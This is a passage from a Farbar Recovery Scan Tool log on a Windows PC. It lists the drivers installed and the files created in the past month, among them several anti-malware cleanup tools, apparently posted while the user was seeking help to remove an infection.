R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-27] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R1 nvkflt; C:\Windows\system32\DRIVERS\nvkflt.sys [307768 2016-01-23] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [448072 2013-04-24] (RTS Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [34544 2015-10-29] (Synaptics Incorporated)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-27 02:11 - 2016-02-27 02:11 - 00031011 _____ C:\Users\Eirik\Desktop\FRST.txt
2016-02-26 00:48 - 2016-02-26 00:48 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (3).exe
2016-02-25 22:28 - 2016-02-26 00:48 - 00001181 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-02-25 22:28 - 2016-02-26 00:48 - 00001169 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-02-25 22:28 - 2016-02-26 00:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-25 22:28 - 2016-02-26 00:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-25 22:27 - 2016-02-25 22:27 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (2).exe
2016-02-25 21:00 - 2016-02-25 21:00 - 00001290 _____ C:\Users\Eirik\Desktop\Revo Uninstaller.lnk
2016-02-25 21:00 - 2016-02-25 21:00 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-25 21:00 - 2016-02-25 21:00 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-02-25 20:59 - 2016-02-25 20:59 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Eirik\Downloads\revosetup.exe
2016-02-23 23:52 - 2016-02-23 23:52 - 02870984 _____ (ESET) C:\Users\Eirik\Downloads\esetsmartinstaller_enu (1).exe
2016-02-23 23:28 - 2016-02-23 23:28 - 00001684 _____ C:\Users\Eirik\Desktop\MyEsetScan.txt
2016-02-23 20:01 - 2016-02-23 20:01 - 02870984 _____ (ESET) C:\Users\Eirik\Desktop\esetsmartinstaller_enu.exe
2016-02-23 20:00 - 2016-02-23 20:00 - 02870984 _____ (ESET) C:\Users\Eirik\Downloads\esetsmartinstaller_enu.exe
2016-02-22 22:57 - 2016-02-22 22:57 - 01511936 _____ C:\Users\Eirik\Downloads\adwcleaner_5.036.exe
2016-02-22 22:57 - 2016-02-22 22:57 - 01511936 _____ C:\Users\Eirik\Desktop\adwcleaner_5.036.exe
2016-02-22 22:48 - 2016-02-22 22:48 - 00000541 _____ C:\Users\Eirik\Desktop\JRT.txt
2016-02-22 22:16 - 2016-02-22 22:16 - 01609216 _____ (Malwarebytes) C:\Users\Eirik\Downloads\JRT (1).exe
2016-02-22 22:13 - 2016-02-22 22:13 - 01609216 _____ (Malwarebytes) C:\Users\Eirik\Desktop\JRT.exe
2016-02-22 22:01 - 2016-02-22 22:03 - 00012892 _____ C:\Users\Eirik\Desktop\Fixlog.txt
2016-02-22 18:03 - 2016-02-22 18:03 - 00001625 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-02-22 18:01 - 2016-02-22 18:01 - 30993712 _____ (Riot Games) C:\Users\Eirik\Downloads\LeagueofLegends_EUNE_Installer_9_15_2014.exe
2016-02-22 01:42 - 2016-02-22 01:42 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (1).exe
2016-02-21 19:45 - 2016-02-23 23:27 - 00001359 _____ C:\Users\Eirik\Desktop\SpyHunter.lnk
2016-02-21 19:45 - 2016-02-22 16:44 - 00003254 _____ C:\WINDOWS\System32\Tasks\SpyHunter4Startup
2016-02-21 19:45 - 2016-02-21 19:45 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Enigma Software Group
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\sh4ldr
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 _____ C:\autoexec.bat
2016-02-21 19:44 - 2016-02-21 19:44 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Eirik\Downloads\SpyHunter-Installer.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64 (1).exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Desktop\FRST64.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 00000000 ____D C:\Users\Eirik\Documents\Egendefinerte Office-maler
2016-02-21 16:22 - 2016-02-27 02:11 - 00000000 ____D C:\FRST
2016-02-21 16:21 - 2016-02-21 16:21 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64.exe
2016-02-21 16:21 - 2016-02-21 16:21 - 01722368 _____ (Farbar) C:\Users\Eirik\Downloads\FRST.exe
2016-02-21 15:20 - 2016-02-21 15:20 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (2).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 07186992 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 06554576 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 05673816 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (3).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 01453976 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (1).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04995416 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (3).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04961800 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (2).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04216840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (2).exe
2016-02-21 15:17 - 2016-02-21 15:17 - 03200960 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (1).exe
2016-02-21 15:16 - 2016-02-21 15:16 - 02723264 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (1).exe
2016-02-21 15:15 - 2016-02-21 15:15 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm.exe
2016-02-21 15:14 - 2016-02-27 02:00 - 00000998 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-21 15:14 - 2016-02-26 15:19 - 00001002 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-21 15:14 - 2016-02-21 15:14 - 00003974 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-21 15:14 - 2016-02-21 15:14 - 00003738 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-21 15:14 - 2016-02-21 15:14 - 00002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Deployment
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Apps\2.0
2016-02-21 14:44 - 2016-02-21 15:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-21 14:44 - 2016-02-21 14:44 - 13767776 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vc_redist.x86.exe
2016-02-21 13:44 - 2016-02-21 13:44 - 00242080 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2.exe
2016-02-21 12:57 - 2016-02-27 01:58 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-21 12:56 - 2016-02-21 12:56 - 22908888 _____ (Malwarebytes ) C:\Users\Eirik\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-21 12:56 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-21 12:46 - 2016-02-22 23:04 - 00000000 ____D C:\AdwCleaner
2016-02-21 12:46 - 2016-02-21 12:46 - 01511424 _____ C:\Users\Eirik\Downloads\adwcleaner_5.035.exe
2016-02-21 04:20 - 2016-02-21 04:20 - 00000000 ____D C:\Users\Eirik\Desktop\Gamle Firefox-data
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\Users\Eirik\AppData\Local\Jagex
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\ProgramData\Jagex
2016-02-19 12:44 - 2016-02-19 12:44 - 03269920 _____ (Jagex Ltd ) C:\Users\Eirik\Downloads\RuneScape-Setup.exe
2016-02-18 00:04 - 2016-02-18 00:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-02-17 13:06 - 2016-02-23 19:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-17 13:05 - 2016-02-23 19:00 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-02-17 13:05 - 2016-02-17 13:05 - 01113856 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\Setup.X86.nb-no_O365ProPlusRetail_a9a627a4-ddaa-4aab-9b90-4499b4a944e3_TX_PR_.exe
2016-02-17 12:17 - 2016-02-17 12:17 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\GeoGebra 5.0
2016-02-15 14:58 - 2016-02-15 14:58 - 00005019 _____ C:\Users\Eirik\Downloads\replay_1346256955.bat
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\ProgramData\WinZip
2016-02-13 01:45 - 2016-02-13 01:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-13 01:45 - 2016-02-13 01:49 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-12 02:51 - 2016-02-06 11:48 - 25839104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-12 02:51 - 2016-02-06 11:24 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-02-12 02:51 - 2016-02-06 11:01 - 20366848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-12 02:51 - 2016-02-06 10:43 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-02-12 02:51 - 2016-02-06 10:32 - 14458368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:16 - 12857856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:09 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-12 02:51 - 2016-02-06 09:54 - 01312256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 10:44 - 2016-01-22 09:01 - 22365992 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-02-10 10:44 - 2016-01-22 08:11 - 19794896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-02-10 10:44 - 2016-01-22 06:25 - 14467072 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 10:44 - 2016-01-22 06:14 - 12879360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 10:44 - 2016-01-15 02:42 - 00033472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-02-10 10:44 - 2016-01-14 21:44 - 01362944 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-02-10 10:44 - 2016-01-10 20:37 - 00442720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:39 - 00332640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:15 - 00401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-02-10 10:44 - 2016-01-10 19:15 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-02-10 10:44 - 2016-01-10 18:50 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:43 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:31 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 10:44 - 2016-01-10 18:16 - 00898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 18:14 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:12 - 00532480 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 01442304 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:02 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:58 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 10:44 - 2016-01-10 17:56 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2016-02-10 10:44 - 2016-01-10 17:51 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 17:49 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EncDec.dll
2016-02-10 10:44 - 2016-01-10 17:43 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:40 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 10:44 - 2016-01-07 19:34 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-02-10 10:44 - 2015-12-29 16:45 - 07783936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 10:44 - 2015-12-29 16:45 - 07075328 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:43 - 05267968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:42 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 10:43 - 2016-01-22 07:40 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-02-10 10:43 - 2016-01-22 07:29 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 10:43 - 2016-01-22 07:28 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 10:43 - 2016-01-22 07:27 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-02-10 10:43 - 2016-01-22 07:02 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-02-10 10:43 - 2016-01-22 06:55 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:52 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 10:43 - 2016-01-22 06:51 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-02-10 10:43 - 2016-01-22 06:50 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:48 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-02-10 10:43 - 2016-01-22 06:48 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:47 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:46 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:35 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:28 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-02-10 10:43 - 2016-01-22 06:27 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:24 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:08 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02778624 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02120704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 05:58 - 02464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-02-10 10:43 - 2016-01-19 20:14 - 07453024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-02-10 10:43 - 2016-01-19 20:13 - 02175008 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 10:43 - 2016-01-19 20:13 - 01063464 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01737088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 10:43 - 2016-01-19 20:12 - 01133744 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01564496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 01501496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 10:43 - 2016-01-19 19:23 - 00548024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 10:43 - 2016-01-19 19:15 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 10:43 - 2016-01-19 18:30 - 00862720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 10:43 - 2016-01-19 17:37 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2016-02-10 10:43 - 2016-01-10 20:37 - 00136912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-02-10 10:43 - 2016-01-10 17:51 - 03707392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 10:43 - 2016-01-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:38 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2016-02-10 10:43 - 2016-01-10 17:36 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 02243584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2016-02-10 10:43 - 2016-01-10 17:35 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2016-02-10 10:43 - 2016-01-10 17:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2016-02-10 10:43 - 2016-01-10 17:27 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2016-02-10 10:43 - 2016-01-10 17:26 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 10:43 - 2016-01-06 19:25 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 10:43 - 2015-12-28 22:42 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSync.dll
2016-02-10 10:43 - 2015-12-28 21:31 - 00578048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSync.dll
2016-02-10 10:43 - 2015-12-17 19:29 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 10:43 - 2015-12-17 17:17 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-02-05 15:36 - 2016-02-05 15:41 - 00000000 ____D C:\WINDOWS\system32\NV
2016-02-05 15:36 - 2016-01-23 02:12 - 00110016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2016-02-05 15:34 - 2016-01-23 04:42 - 42983992 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 37614528 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 31079992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 24911296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 21193544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 20733832 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17626352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 17218792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 16327896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 12379072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 03145272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 02721216 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01924152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 01573432 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6436175.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00948672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00880576 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00747064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00689600 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00501896 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00425016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00423080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00377792 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00307768 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvkflt.sys
2016-02-05 15:34 - 2016-01-23 04:42 - 00151368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00128512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2016-02-05 15:34 - 2016-01-23 04:42 - 00038336 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
